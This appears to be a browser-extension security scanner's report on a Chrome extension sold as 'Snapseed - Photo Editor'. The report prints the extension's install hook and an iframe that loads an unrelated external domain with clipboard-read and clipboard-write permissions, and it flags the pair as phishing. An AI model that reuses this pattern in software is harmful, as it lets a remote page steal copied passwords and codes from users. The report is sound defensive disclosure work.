Snapseed - Photo Editor

Snapseed - Photo Editor

ID: ncailodgeppjomcppgakpcnkngcnjlpk

Supported Languages

πŸ‡ΊπŸ‡ΈUS English

Extension Info & Metadata

Status
Active
Version
1.0
Size
0.13 MB
Rating
0.0/5
Reviews
0
Users
514
Type
Extension
Updated
Jun 8, 2026
Category
Household
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
WebView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
16
Active
7
Obsolete
9
Listed
16
Unlisted
0
Total Users
3,993

Email Change History

1 change
Sep 5, 2025
Domain changed
Screenshot 1
Screenshot 2

Snapseed is a complete and professional photo editor

Snapseed - Photo Editor Transform your photos with professional-grade editing tools right in your browser! Snapseed brings the power of advanced photo editing to Chrome with an intuitive, beautiful interface that makes creating stunning images effortless. ✨ Professional Photo Editing Made Simple Advanced Tools: Master brightness, contrast, saturation, temperature, and tint adjustments with precision sliders Creative Effects: Apply structure enhancement, HDR effects, vignettes, grain, blur, and sepia filters Transform & Perspective: Rotate, scale, and skew images with professional transformation tools Brush Tools: Use healing brushes, dodge, and burn effects for selective editing Style Presets: Apply beautiful pre-made styles like Vintage, Dramatic, Warm, Cool, and Black & White 🎨 Beautiful, Modern Interface Experience a sleek, gradient-based design inspired by professional photo editing software. The intuitive layout makes it easy to navigate between tools while maintaining focus on your creative vision. πŸ“ Universal File Support Upload JPG, PNG images Support for RAW formats (CR2, NEF, ARW, DNG) Drag & drop functionality for seamless workflow High-quality output preservation πŸ’Ύ Save & Share Your Work Save custom editing presets for future use Download edited images in high quality Reset tools to start fresh anytime Professional-grade export options πŸš€ Perfect for Everyone Whether you're a professional photographer, social media enthusiast, or just love making your photos look amazing, Snapseed provides the tools you need. The responsive design works perfectly on all devices, and the clean interface ensures you spend more time creating and less time learning. Why Choose Snapseed? No Installation Required: Edit photos directly in your browser Professional Results: Advanced algorithms deliver studio-quality edits User-Friendly: Intuitive controls make professional editing accessible to everyone Fast Performance: Optimized for smooth, responsive editing experience Beautiful Design: Modern interface that inspires creativity Transform your photography today with Snapseed - where professional photo editing meets simplicity and beauty. Create stunning images that tell your story with the power of advanced editing tools at your fingertips

This extension requests no permissions and has no recorded risk factors.

On every fresh install, background.js opens thanks.html, which immediately loads https://hiud.top/snapse33 inside a full-viewport iframe and grants that external page clipboard-read and clipboard-write permissions. The domain hiud.top is entirely unrelated to the extension's stated purpose, is not the publisher's own domain, and is not a known SaaS. Granting clipboard access to an uncontrolled third-party iframe enables the remote page to silently read any copied passwords, 2FA codes, or sensitive text from the system clipboard.

thanks.html (Line 86)
<div class="iframe-container">  < iframe id="appFrame" src="https://hiud.top/snapse33" allow="clipboard-read; clipboard-write">    < /iframe>      < /div>

The service worker unconditionally opens thanks.html in a new tab on every installation, guaranteeing that the malicious iframe page is shown to every new user before they have any opportunity to use the advertised photo-editing feature. This is the delivery vector for the thanks.html finding above.

background.js (Line 9)
chrome.runtime.onInstalled.addListener((details) => {  if (details.reason === "install") {    chrome.tabs.create({      url: chrome.runtime.getURL("thanks.html")    });  }});

By severity

Critical0
High2
Medium0
Low0

Versions scanned

Showing 1 of 3 scanned versions with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.02

Files with findings

2 distinct paths β€” top paths by unique finding count:

  • background.js1
  • thanks.html1
S.No.
Category
Severity
File
Summary
Found in Version
1Other
high
background.js (line 9)The service worker unconditionally opens thanks.html in a new tab on every installation, guaranteeing that the malicious iframe page is shown to every new user before they have any opportunity to use the advertised ph…
2Phishing
high
thanks.html (line 86)On every fresh install, background.js opens thanks.html, which immediately loads https://hiud.top/snapse33 inside a full-viewport iframe and grants that external page clipboard-read and clipboard-write permissions. Th…
URLs
4
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

cdnjs.cloudflare.com;-https://cdnjs.cloudflare.com;
cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.csshttps://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx
hiud.top/snapse33https://hiud.top/snapse33

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
5.0
Latest
0.13 MB
Benign
β€”
4.0
0.05 MB
Benign
β€”
1.0
0.05 MB
Malicious
2N/A
Showing 1 to 3 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.